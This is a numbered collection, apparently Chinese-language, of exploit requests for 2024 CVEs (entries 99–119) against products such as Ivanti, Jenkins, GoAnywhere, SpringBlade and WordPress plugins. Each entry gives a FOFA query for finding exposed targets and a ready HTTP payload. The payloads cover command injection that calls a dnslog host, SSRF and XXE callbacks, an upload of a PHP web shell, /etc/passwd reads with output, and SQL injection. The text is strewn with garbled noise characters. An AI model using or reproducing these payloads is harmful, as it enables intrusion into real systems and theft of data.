. n5 c; T$ X ?+ \' B9 o8 ^8 r+ z# J$ H9 a
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
1 ^: v$ s, ~1 h* m3 [* L0 v8 a5 N6 ~
9 v- u8 T7 E H* Z8 g4 `
99. Ncast盈可视高清智能录播系统busiFacade RCE4 q( {1 `1 N- s _: @* d
CVE-2024-0305
; S8 n0 H4 H1 L" T1 i2 kFOFA:app="Ncast-产品" && title=="高清智能录播系统"& [, a" X+ T. h& S6 P1 I
POST /classes/common/busiFacade.php HTTP/1.1
+ [% a- ^+ T0 X; ]( gHost: 192.168.40.130:8080
# n% X* _) J3 m TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) U8 q! O6 T6 y3 W& ]Connection: close$ R. x {2 T3 H; V' M) \8 c
Content-Length: 154
( t$ M5 Q4 B% EAccept: */*" `8 z" l0 M- j' G
Accept-Encoding: gzip, deflate
3 o4 E0 {9 D9 f# H; K9 D7 ~0 h- ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- X# v$ G+ D. UContent-Type: application/x-www-form-urlencoded; charset=UTF-8- R9 {3 t6 ?& \6 Q0 X! Q
X-Requested-With: XMLHttpRequest
& ~1 [2 r% x. K$ p0 x B: c" c9 R8 r: [8 W) w
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
0 I4 ~& U" q1 O9 j w
r' q' C3 z; O, w0 }, _
" D& ?" J% C. y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
8 X4 ]. Q/ o# e- F7 Q5 uCVE-2024-03525 h5 a# F; j- [* w) Q
FOFA:icon_hash="874152924"
- E2 t: F1 i3 ~' QPOST /api/file/formimage HTTP/1.15 X' i+ h# V/ I2 B. m( d7 Y# i
Host: 192.168.40.1305 D+ `2 G7 c& {5 m5 p4 D0 Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ w# c# _2 n8 h$ x( D- P* ?: K# _! @Connection: close
( i# W& U% q+ l5 hContent-Length: 201. F' l" ?! D: q" w+ e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 _) m V4 e" _2 L# KAccept-Encoding: gzip
/ X: k$ s1 T v. F8 _
8 P9 W2 F( |3 Y$ s( ]+ d: u3 e! b$ t------WebKitFormBoundarygcflwtei
2 p% D7 a) x* U/ fContent-Disposition: form-data; name="file";filename="IE4MGP.php"
. c. G: ]0 o# j' k2 m/ bContent-Type: application/x-php
/ N" c6 f$ n8 m2 d5 r. F
' [$ o5 P& K, H, {2ayyhRXiAsKXL8olvF5s4qqyI2O; n$ A6 h; R+ o" V+ u
------WebKitFormBoundarygcflwtei--4 i: I% |7 @2 T; m! X
2 k; ^" J+ A0 P7 A* O$ R1 g
6 A. ~, j; e2 E+ c101. ivanti policy secure-22.6命令注入7 Q" p7 \4 t' f" s0 u* C- H7 U
CVE-2024-21887/ A/ }' I2 U' f5 ]8 f; G) W( v
FOFA:body="welcome.cgi?p=logo"
( v( H4 B" q% r0 C7 ^GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
% T' }: W4 H( W4 g. @7 x Q2 G- s/ H* bHost: x.x.x.xx.x.x.x
% {2 [! Q) \' K2 X; f+ \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; E7 {- C! J8 G% Y9 E: H* Z
Connection: close6 K; @( t1 U8 ?+ R, J+ ?& Y: v
Accept-Encoding: gzip d) v0 @1 d8 ^# T' c" p F5 a
# k0 b7 w+ b, o7 R- e* S
3 B+ ^9 F$ X" \" M102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
: a4 i2 g9 `5 A1 r, qCVE-2024-218938 i( Q& m v2 i6 \' P/ i5 C4 {' s! D
FOFA:body="welcome.cgi?p=logo"! O9 T% y' ?& U. t$ n! _. g
POST /dana-ws/saml20.ws HTTP/1.1" `/ L) M2 I% t* i7 Z8 X2 s) {
Host: x.x.x.x9 m- z4 P# r/ o7 u4 I- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 h" V6 p* o1 h( G, H _Connection: close
# N3 R: B- b g/ {) RContent-Length: 792
0 G. t- f" G% H- o" @Accept-Encoding: gzip0 b" b) G c) T
' ]9 o: Q' s- U( @, M; W) h<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>. a( E" |9 {1 Z" h) v
9 Q" o' j# O- X6 f6 r5 U
103. Ivanti Pulse Connect Secure VPN XXE
& e4 O: @6 K& w m6 OCVE-2024-220248 [2 U% L( B# Z' v6 a# d- x' ]7 u
FOFA:body="welcome.cgi?p=logo"9 z, z; i) f( Y) J3 N
POST /dana-na/auth/saml-sso.cgi HTTP/1.1) L; Z6 `; P6 `
Host: 192.168.40.130:111/ t1 C# {# C) d
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
+ r( l1 @7 Y' ]Connection: close" |5 h) [5 {+ v0 k
Content-Length: 204
# T4 c8 Q/ j. w3 ZContent-Type: application/x-www-form-urlencoded
! i* A& T o; s+ v/ UAccept-Encoding: gzip) Y! t1 k8 H( M
4 [ H5 `* b6 }
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==: P& D' M2 F0 ?9 ?0 j" K* r$ R4 u
# c; v/ c' h$ \$ K9 c5 D6 V1 o! y; Q$ Y
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下0 `# P; A; Z8 s: X( t
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
# u$ T4 Z) _( ]+ o, U
* z; E6 {/ c. T! b8 w5 @) X
1 F' w. z4 G, |6 L% f104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 e5 ~' p8 `3 H& J. {; e8 {
CVE-2024-0569
1 c1 h: v. J; S0 D8 vFOFA:title="TOTOLINK"( f* ?8 _; N/ _. ^7 L
POST /cgi-bin/cstecgi.cgi HTTP/1.1) q& T0 [7 ?3 C( l
Host:192.168.0.1" r* c9 |5 D4 f" _3 _
Content-Length:41 m# R1 f' s4 {! J. R. z' r
Accept:application/json,text/javascript,*/*;q=0.01% }) v `* i$ J* |; N9 H8 G+ o
X-Requested-with: XMLHttpRequest6 ], d; k3 e- T! Y7 u& c6 i' v
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.365 r0 p8 D+ H; d; G% L. V
Content-Type: application/x-www-form-urlencoded:charset=UTF-81 I/ }! W- j9 k, n$ r4 c
Origin: http://192.168.0.1
3 w) R- n, w5 o8 t+ kReferer: http://192.168.0.1/advance/index.html?time=1671152380564 ?1 @) F! U; h
Accept-Encoding:gzip,deflate
+ |4 ?" f1 k! k; v; h) }9 F9 IAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
3 a! J2 G' q( AConnection:close4 R& I; R5 e* Y2 _. A# c
3 x, w6 [. y8 ?5 b7 G5 _' L: m. B{; S( s0 j4 [, {: Y5 Q
"topicurl":"getSysStatusCfg",
* U: I2 p: z; L5 _3 p"token":"": s* ~; O2 {( {+ t4 r& D
}
+ O# `: R$ A K n# V% k' W( d9 z6 F0 d! U M( r. P
105. SpringBlade v3.2.0 export-user SQL 注入
% A! P( i8 e8 v5 H5 g, O; M7 QFOFA:body="https://bladex.vip"
! g9 _( v& N5 D& _ X6 zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1' A$ ` q1 |' ^& X! u: N, a+ }; o5 P4 ?- Y
; W5 z. J) G. i5 I9 s
106. SpringBlade dict-biz/list SQL 注入
, Z$ Z5 c7 W- u9 UFOFA:body="Saber 将不能正常工作"8 E# C6 E- |+ n) ^( i$ @
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
2 D% v: k p" z1 ^0 CHost: your-ip
; {" a0 Q' J. T( C# L, F FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. M5 M; D4 d4 e9 R0 C& }& p7 YBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A, K4 @( N; g3 m7 H
Accept-Encoding: gzip, deflate Z3 e3 k; O7 f! l/ g; ^# h
Accept-Language: zh-CN,zh;q=0.9" f( \; U/ ]; \7 B/ Y& D" k
Connection: close
7 K* I! K6 U/ v* H* N1 M. u0 [ \, r7 N0 T8 V* O2 X; _6 `
& W7 _; R8 \0 x6 n( m: @
107. SpringBlade tenant/list SQL 注入9 d! `5 {2 p# B5 i# Y4 l5 ~' V5 [
FOFA:body="https://bladex.vip"1 c7 _9 z! P" c' n$ l& ? c# b
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 u0 F3 U0 W( T8 @, L* H5 lHost: your-ip
/ x D1 z- S, l& |. E% wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# }! j! P3 A& q& S* \( l
Blade-Auth:替换为自己的
" s* P7 |# U, a+ v1 nConnection: close
. z9 H7 R& `$ m2 T! r) a! T- W" f1 S
z0 X3 w& i9 m. {1 R1 u
108. D-Tale 3.9.0 SSRF/ ?$ E7 L9 w) W0 s7 F% O
CVE-2024-21642
: b4 ^) S5 P e9 L! d& i. }# o, dFOFA:"dtale/static/images/favicon.png": W" F& l' j' K
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
, }7 P+ J) t0 b/ Z' W {Host: your-ip
& _& ]! S. b# ZAccept: application/json, text/plain, */*
4 T2 l; h7 _+ Z$ |. w `9 [9 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 A2 R8 u( Y0 N3 X" |+ M
Accept-Encoding: gzip, deflate
% i- }* n* {" A7 IAccept-Language: zh-CN,zh;q=0.9,en;q=0.80 J; G, O O# c; b. j4 w
Connection: close
_( {9 g1 X0 G: E3 z' u
0 a5 M8 k2 N" ]8 L3 @
5 Y- S s% P0 h, X( }109. Jenkins CLI 任意文件读取2 V+ \7 o0 m1 k; Q: V2 f6 M
CVE-2024-23897
1 }. U2 E; b( C8 Q/ ~3 y3 i& Y: lFOFA:header="X-Jenkins"
" P; H3 e6 L) X. b+ H; pPOST /cli?remoting=false HTTP/1.1
" U3 l. l7 b- [Host:1 n0 P4 T* [( X
Content-type: application/octet-stream
4 b& X: ]! y) W$ xSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92, N" b! m W/ J: ~
Side: upload
- m$ C* L" m& o: w% _* @Connection: keep-alive
& ?* c4 R6 u% m7 b& z" K) w$ TContent-Length: 1636 ? ?; n2 d9 @2 w5 r
- Z2 O% D5 f A& l4 [2 Q
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03' N- W* r$ \+ H' {0 H7 B
5 s' O$ B, w2 E) _
, U: |9 J& E2 b7 W, Z3 p! }POST /cli?remoting=false HTTP/1.1
$ a Q D% i' p$ Z( }Host:
+ O! l. |1 W6 F- y4 c9 N$ j- ySession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ x& p0 {. [3 {3 |+ fdownload% t8 }7 G: L7 F2 z3 A2 b& g$ E
Content-Type: application/x-www-form-urlencoded
+ F* E8 e' D8 \8 [) @ AContent-Length: 07 d5 ^: d/ \; l3 v7 _& f
( a, n; A2 n& |# p$ R1 Y4 ], \: t+ z
3 [2 [: j W; s
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin/ b) y8 u9 _9 {* L; W( h2 O# a
java -jar jenkins-cli.jar help# s- H# W% o2 X. S
[COMMAND]/ P0 n7 C/ y! [/ x% g6 Z
Lists all the available commands or a detailed description of single command.# H) D* ], C ]+ L
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
; N% `' b3 {3 A* ?" q) L! F; t% H4 v2 q# p9 d3 j J
! {, D- E& e* V: S$ u9 T
110. Goanywhere MFT 未授权创建管理员- a$ Z6 w9 t; }: q6 p
CVE-2024-0204# v8 N* c3 G% N/ |, |9 Y: L, w) Z9 C9 v
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"$ z- r. d4 d0 k' r1 ?% Q
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
5 c' W1 K: D1 O6 p U! |1 ?; w; bHost: 192.168.40.130:8000
/ } K! @" i% f; m1 I% z6 U& O8 yUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36! ?3 s- }" E+ X- M2 l
Connection: close0 a( ?% n5 Z' R# V
Accept: */*( i7 c/ X, L* M& L" L$ j+ z/ f
Accept-Language: en
& Z$ h: G+ c- n& r3 U$ R' tAccept-Encoding: gzip
8 H8 c% s$ x: |1 _
( v2 [! ~8 @+ B4 _9 m: b+ X
* Y& c' \8 m, v1 \9 v% c# w& }# ?111. WordPress Plugin HTML5 Video Player SQL注入* J! m5 f+ R. ~0 J% q, C
CVE-2024-1061: J8 i7 h4 i( T
FOFA:"wordpress" && body="html5-video-player"# R- T/ y/ }9 T/ ]7 L, k$ Z& q; B
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1* e6 o2 [+ j# V/ ?7 I
Host: 192.168.40.130:112+ I$ ?1 o" @7 y' b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& x; R, L4 ]! E" r0 J' n) TConnection: close9 q( \& l/ T* t
Accept: */*) j' k- J4 n+ h4 p$ \; y
Accept-Language: en
0 ?) g7 x) P% E( ^ n- A) F8 M- J9 ZAccept-Encoding: gzip
! Y. a2 V% f/ W8 ~6 n5 q
5 Z! [9 f0 J$ ~5 R5 S# }6 G7 R) M n0 J8 f- n
112. WordPress Plugin NotificationX SQL 注入7 k w3 s. P. Y; ^- I' f
CVE-2024-1698
0 X4 h6 `( C9 m7 rFOFA:body="/wp-content/plugins/notificationx"
7 Q/ O8 Y" e" ^2 C, f8 e2 ^POST /wp-json/notificationx/v1/analytics HTTP/1.1 a E/ R5 l! _8 J
Host: {{Hostname}}4 u7 g4 W9 K, t1 q3 L9 v- w
Content-Type: application/json* H) R$ w# b7 ^2 z: @3 Q) V
& L8 i% C. D: m. |{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
3 ], y6 \% ?; D3 ^. p8 M7 J
7 W4 ?2 V: N5 _6 K. r# C
: O" |) |2 L+ S) m) c+ `- c* \113. WordPress Automatic 插件任意文件下载和SSRF! v7 L% p; M: Q4 m% }5 F$ ^. ~
CVE-2024-27954
# z8 Q# T) U' G' x/ iFOFA:"/wp-content/plugins/wp-automatic": G/ f8 u0 t3 Z8 S J5 ?
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
& j# ~3 E1 d1 B) eHost: x.x.x.x5 K( Z* T/ _: z% i4 V; t' I
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 J: u4 ^- x+ j9 t) G) |# r5 [Connection: close4 c" g o& {6 ]0 k/ h* p
Accept: */*& N1 e6 s+ c: `% H7 j! l) _
Accept-Language: en6 P) a3 Q0 D/ {
Accept-Encoding: gzip `% g' g5 p6 ?3 F, ]
1 ?1 s; v6 s- I# E3 `% S5 b! X1 O: t
" N. o4 e/ e* C7 Y4 j' a
114. WordPress MasterStudy LMS插件 SQL注入+ a0 N8 M% }8 J/ l# X9 K
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") |) j" F+ x- G' @
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 R& {3 Q2 g& C. ^' d+ H. Y$ w/ ]
Host: your-ip; J: n4 N. B' Y+ e2 [
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 R* \& q; n1 I. `1 D, [: `8 v
Accept-Charset: utf-8
2 \2 e0 `) ]' P! b4 OAccept-Encoding: gzip, deflate8 `5 } ]2 m& l, M& j$ U. ^, d
Connection: close, S" a! S0 }* s6 R
6 \0 Z5 d" m+ F7 Q) |
$ f) o @! D% v. p115. WordPress Bricks Builder <= 1.9.6 RCE' p3 ~$ b$ h0 g* R+ `' M* @6 x
CVE-2024-25600
/ a0 _+ u3 P. F0 f* C A0 B5 nFOFA: body="/wp-content/themes/bricks/"
c( n5 t! V6 P第一步,获取网站的nonce值
& a/ a2 L# f! Z3 TGET / HTTP/1.1
7 `' K# [) d9 |' B1 YHost: x.x.x.x9 E% R7 U* T9 c# a8 r/ m
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36, U. B# |5 g5 |7 A* O
Connection: close
$ u$ o; ?+ A; M5 p* X) |3 x& rAccept-Encoding: gzip7 [- G5 z; [. x3 O$ Q4 E6 |
+ N3 s' M* ^5 @% q' `
8 Q& J" A A! ^" r1 K, M第二步替换nonce值,执行命令
+ B# @+ M- ~) Y8 r3 `! z4 mPOST /wp-json/bricks/v1/render_element HTTP/1.1
: K2 T, {1 L2 Y, A B. |Host: x.x.x.x
& m$ d9 {$ W) V( A+ u3 H; ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& M( b U" T' LConnection: close3 k; o! [/ ]5 d4 c) M) m
Content-Length: 356
* B0 W5 M4 V B& D2 `, e' G4 vContent-Type: application/json. d/ U. I0 k6 u7 g$ K) h, W* o
Accept-Encoding: gzip
0 U* X- _% f. v2 u1 W$ N
4 V9 q( O2 J* X{
( `5 m9 f, P3 M6 Y"postId": "1",/ E7 y, J- P: j0 d7 P, S, r3 ]9 v
"nonce": "第一步获得的值"," O, S3 s" s* q" N4 Z E2 G6 w
"element": {+ W' V# x2 V9 w
"name": "container",9 p! ~, k. ~" S" f6 m' s$ s
"settings": {
# f- ?% u$ E, p g& ? "hasLoop": "true",
0 I! w0 N9 I& V/ u7 o "query": {$ Y& S9 g# C+ L
"useQueryEditor": true,
3 H9 i: T4 b6 @1 L+ i "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",0 {1 y& k6 y* S _: ~+ S; s
"objectType": "post"
2 Y: d, b: w A$ s: I4 I- v3 h }
3 I, B) t' z2 p+ w9 h# O& M+ n; v }
, ~. `1 y7 Q7 q4 j; J% m4 T: d# B }9 k! x5 r. ~3 _" ]7 C1 g+ G
}
5 S5 Y4 [7 I$ n7 _/ a1 p, ]) i* }1 S7 ?
; f' ~7 x* T6 ]1 d% j5 g1 z. R116. wordpress js-support-ticket文件上传+ h( t8 d; q$ i# g
FOFA:body="wp-content/plugins/js-support-ticket"3 N& Y* z" N/ Y) ]8 n
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
4 f. i: s+ t0 |: S: e7 hHost:
- e$ A U- J, OContent-Type: multipart/form-data; boundary=--------767099171
8 `7 |1 `4 u& e+ N8 ]! }User-Agent: Mozilla/5.0* G6 V S6 V* [, B: f
( d5 l5 n+ {, y4 n: R& h& k4 O----------767099171- q7 Y1 X2 b, w( v& \
Content-Disposition: form-data; name="action"
( k$ T' L# W5 qconfiguration_saveconfiguration
2 J' q( L) l) F0 Y& z/ h----------767099171
: N' `3 [5 v( G( a4 HContent-Disposition: form-data; name="form_request"$ Y1 P: Y8 m* R: W0 e
jssupportticket
: I" o3 G* q3 m) g----------767099171
5 t; P9 }5 ?; TContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
! \ t+ b) G1 lContent-Type: image/png; ^9 q& r3 |, }) ^
----------767099171-- H C) D- p; v( J7 r, j2 T* L4 \
$ s7 d+ M3 n( ^% K/ h" J: X# Q _% q
# O4 k ]) {6 R3 S7 V$ R; C117. WordPress LayerSlider插件SQL注入
0 _+ q# K$ m+ p% Aversion:7.9.11 – 7.10.0
6 O/ g0 U- j. z7 }8 sFOFA:body="/wp-content/plugins/LayerSlider/"! I/ S: a: n4 o. O$ Y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1' ^6 Z% |( C- }7 B; ?- V. S
Host: your-ip
. l! `( l& N+ W% B, M+ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& O( c. D- ?' l7 s7 N( {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 G4 {: W! E& w3 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! `: b: o S8 h& T: p& TAccept-Encoding: gzip, deflate, br6 x! Z0 _1 ~& s. G `: g3 G& P
Connection: close
8 _8 A) n6 o2 D' x4 bUpgrade-Insecure-Requests: 1
9 u2 B! Z8 \- x2 |) l* {9 h. F" P# ~. d
0 m! \6 `+ K1 t9 D# E6 Q: R- \& o& e
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传9 L7 q& u( |5 q* |+ X' y! O
CVE-2024-0939
/ A! T/ |4 R, jFOFA:title="Smart管理平台"
* a2 x0 R6 J. l2 uPOST /Tool/uploadfile.php? HTTP/1.1
1 `1 J" ]0 V" h" I7 Z8 MHost: 192.168.40.130:8443
) I* v6 p" t0 l1 YCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
4 B/ G" \, ?" T6 Q# kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
: X3 y- s- Y, l( F4 T2 B: tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- w% M8 \: ?8 q l7 a6 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 f# P7 ]5 x, w# o
Accept-Encoding: gzip, deflate
* T4 @4 X H( [! wContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828875 M: m: a% A! r
Content-Length: 405( V9 `5 K7 K# I0 i
Origin: https://192.168.40.130:8443& H+ h: V5 r' k' ?- u( v2 u
Referer: https://192.168.40.130:8443/Tool/uploadfile.php9 q9 z$ ~( Y9 B
Upgrade-Insecure-Requests: 1
2 j) i$ c _( b5 ]Sec-Fetch-Dest: document3 e) O9 h$ V# l$ w
Sec-Fetch-Mode: navigate) }% P% k% f0 m4 v* n, g7 l
Sec-Fetch-Site: same-origin
, A4 X8 j: i4 D4 f1 P/ tSec-Fetch-User: ?1! M6 ]. Q' Z. P1 l) n
Te: trailers! C$ m) m- b9 ?5 A, {
Connection: close
V0 v# L! Q) G( L
, E3 p) h8 k$ [, Z; a-----------------------------13979701222747646634037182887
) |+ M5 V2 `4 ]3 B+ Z8 cContent-Disposition: form-data; name="file_upload"; filename="contents.php". _% f9 j- q5 d3 v6 _ a
Content-Type: application/octet-stream' u4 o7 T, I* v6 B
1 Q, [" C$ H& x
<?php2 }$ u1 {4 R9 ~+ ~) ^5 J
system($_POST["passwd"]);+ Q* [+ V1 q: d2 e* t
?>' d7 J! j+ P7 q: X8 a, I
-----------------------------13979701222747646634037182887
! q/ ^0 W: j/ o) KContent-Disposition: form-data; name="txt_path"
, R9 J: [2 | Y; ^' P
, F: `+ i0 a+ o9 ]+ y" L) x/home/src.php
) J( Z! w5 K# r5 k, a- T8 Q* v-----------------------------13979701222747646634037182887--* C# p, _, @# C5 T: p; J/ Y
3 V$ V: } ~ ?9 o) P2 o. H/ e& u
9 o( @, z, v% n* M* ^: Q% [
访问/home/src.php; h! C1 [3 Q" T% d$ M2 V
- ^8 h; Q. F6 X
119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 o2 h/ ^5 m* Q1 v( s& YCVE-2024-1254' ^- p; o z1 ^ ?8 o
FOFA:title="Smart管理平台"
+ ]! B1 G) n) s$ L" V* W# Z% R先登录进入系统,默认账号密码为admin/admin
5 k% K: h- ^1 ^# m$ N# XPOST /sysmanage/sysmanageajax.php HTTP/1.11
9 f: n* v9 r- [5 b# AHost: x.x.x.x
W9 `) G% R4 A1 w( e; x* UCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee8 i3 z" C4 h2 x5 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
& A6 c$ [. x9 K X. zAccept: */*
( ~3 |, d! x( L* m0 m7 u/ f4 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 N% i' u% [ H4 b0 _2 _( L
Accept-Encoding: gzip, deflate" N6 ]+ X2 X. F6 p* R$ {: R
Content-Type: application/x-www-form-urlencoded;: T3 ?% p. s- j, G$ w
Content-Length: 109
+ u& e8 T |+ d+ H# }+ o: v( u) Q sOrigin: https://58.18.133.60:84435 X, m* |: i& u# ?0 {7 }4 F6 r
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
0 ~: s2 d$ T' K1 n7 fSec-Fetch-Dest: empty& H8 U7 k3 Q4 G$ }
Sec-Fetch-Mode: cors( K3 p4 S# m4 l* d
Sec-Fetch-Site: same-origin! e4 I9 `$ ^* r7 y
X-Forwarded-For: 1.1.1.1
8 c8 z# Z( ^, H1 M& PX-Originating-Ip: 1.1.1.1
4 r- F4 P1 D9 i: X+ lX-Remote-Ip: 1.1.1.1
; c- A+ `: _! NX-Remote-Addr: 1.1.1.1
% T) s9 z' E# xTe: trailers9 x5 W% ~9 `' Q! A6 }' C; O6 t
Connection: close+ b- ]/ l& H; h ^
